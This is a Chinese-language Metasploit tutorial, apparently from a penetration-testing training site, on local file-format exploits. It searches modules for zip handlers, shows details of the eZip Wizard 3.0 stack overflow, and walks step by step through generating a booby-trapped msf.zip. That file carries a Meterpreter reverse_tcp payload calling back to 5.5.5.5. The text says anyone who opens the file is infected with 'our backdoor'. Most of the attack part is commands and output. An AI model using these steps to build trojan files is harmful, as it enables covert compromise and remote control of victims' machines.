Metasploit的本地漏洞利用

web安全学习了解：web渗透测试

官网：宣紫科技

这个很简单的理解，本地例如： RAR ZIP 播放器等等，当我们用MSF生成漏洞文件后，别人用特定的工具打开，就会中马

打开UB 1 ，我们来利用ZIP吧，启动METASPLOIT 搜索rar

msf > search zip
 
Matching Modules
================
 
   Name                                                     Disclosure Date  Rank       Description
   ----                                                     ---------------  ----       -----------
   auxiliary/admin/oracle/post_exploitation/win32upload     2005-02-10       normal     Oracle URL Download
   auxiliary/dos/wifi/netgear_ma521_rates                                    normal     NetGear MA521 Wireless Driver Long Rates Overflow
   auxiliary/dos/wifi/netgear_wg311pci                                       normal     NetGear WG311v1 Wireless Driver Long SSID Overflow
   exploit/multi/fileformat/peazip_command_injection        2009-06-05       excellent  PeaZip <= 2.6.1 Zip Processing Command Injection
   exploit/multi/http/splunk_mappy_exec                     2011-12-12       excellent  Splunk Search Remote Code Execution
   exploit/multi/wyse/hagent_untrusted_hsdata               2009-07-10       excellent  Wyse Rapport Hagent Fake Hserver Command Execution
   exploit/osx/browser/safari_metadata_archive              2006-02-21       excellent  Safari Archive Metadata Command Execution
   exploit/solaris/dtspcd/heap_noir                         2002-07-10       great      Solaris dtspcd Heap Overflow
   exploit/windows/browser/adobe_shockwave_rcsl_corruption  2010-10-21       normal     Adobe Shockwave rcsL Memory Corruption
   exploit/windows/browser/ms06_067_keyframe                2006-11-14       normal     Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability
   exploit/windows/browser/winzip_fileview                  2007-11-02       normal     WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow
   exploit/windows/driver/dlink_wifi_rates                  2006-11-13       low        D-Link DWL-G132 Wireless Driver Beacon Rates Overflow
   exploit/windows/fileformat/ezip_wizard_bof               2009-03-09       good       eZip Wizard 3.0 Stack Buffer Overflow
   exploit/windows/fileformat/real_networks_netzip_bof      2011-01-30       good       Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability
   exploit/windows/fileformat/scadaphone_zip                2011-09-12       good       ScadaTEC ScadaPhone <= v5.3.11.1230 Stack Buffer Overflow
   exploit/windows/fileformat/tugzip                        2008-10-28       good       TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability
   exploit/windows/ftp/3cdaemon_ftp_user                    2005-01-04       average    3Com 3CDaemon 2.0 FTP Username Overflow
   exploit/windows/ftp/easyftp_cwd_fixret                   2010-02-16       great      EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow
   exploit/windows/http/hp_nnm_ovas                         2008-04-02       good       HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow
   exploit/windows/telnet/gamsoft_telsrv_username           2000-07-17       average    GAMSoft TelSrv 1.5 Username Buffer Overflow
   exploit/windows/tftp/attftp_long_filename                2006-11-27       average    Allied Telesyn TFTP Server 1.9 Long Filename Overflow
 
 
msf > 

以ezip_winzard_bof为例： exploit/windows/fileformat/ezip_wizard_bof

msf > info exploit/windows/fileformat/ezip_wizard_bof
 
       Name: eZip Wizard 3.0 Stack Buffer Overflow
     Module: exploit/windows/fileformat/ezip_wizard_bof
    Version: 15014
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Good
 
Provided by:
  fl0 fl0w
  jduck <jduck@metasploit.com>
  Lincoln
 
Available targets:
  Id  Name
  --  ----
  0   Windows Universal
 
Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  msf.zip          yes       The output file name.
  USERNAME                   yes       Username
 
Payload information:
 
Description:
  This module exploits a stack-based buffer overflow vulnerability in 
  version 3.0 of ediSys Corp.'s eZip Wizard. In order for the command 
  to be executed, an attacker must convince someone to open a 
  specially crafted zip file with eZip Wizard, and access the 
  specially file via double-clicking it. By doing so, an attacker can 
  execute arbitrary code as the victim user.
 
References:
 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-1028
 
 
http://www.osvdb.org/52815
 
 
http://www.securityfocus.com/bid/34044
 
 
http://www.edisys.com/
 
 
http://www.exploit-db.com/exploits/8180
 
 
http://www.exploit-db.com/exploits/12059
 
msf > 

eZip Wizard 3.0的本地溢出 我们来生成一下：

msf  exploit(ezip_wizard_bof) > show options 
 
Module options (exploit/windows/fileformat/ezip_wizard_bof):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.zip          yes       The output file name.
   USERNAME                   yes       Username
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Windows Universal
 
 
msf  exploit(ezip_wizard_bof) > set USERNAME 
set USERNAME   
msf  exploit(ezip_wizard_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ezip_wizard_bof) > set USERNAME test
USERNAME => test
msf  exploit(ezip_wizard_bof) > set LHOST 5.5.5.5 
LHOST => 5.5.5.5
msf  exploit(ezip_wizard_bof) > exploit 
 
[*] Creating 'msf.zip' file...
[+] msf.zip stored at /root/.msf4/local/msf.zip
msf  exploit(ezip_wizard_bof) > 

查看一下生成的文件：

root@root:~# file /root/.msf4/local/msf.zip
/root/.msf4/local/msf.zip: Zip archive data, at least v2.0 to extract
root@root:~# 

当别人用eZip Wizard 3.0打开以后 就会中我们的PAYLOAD 后门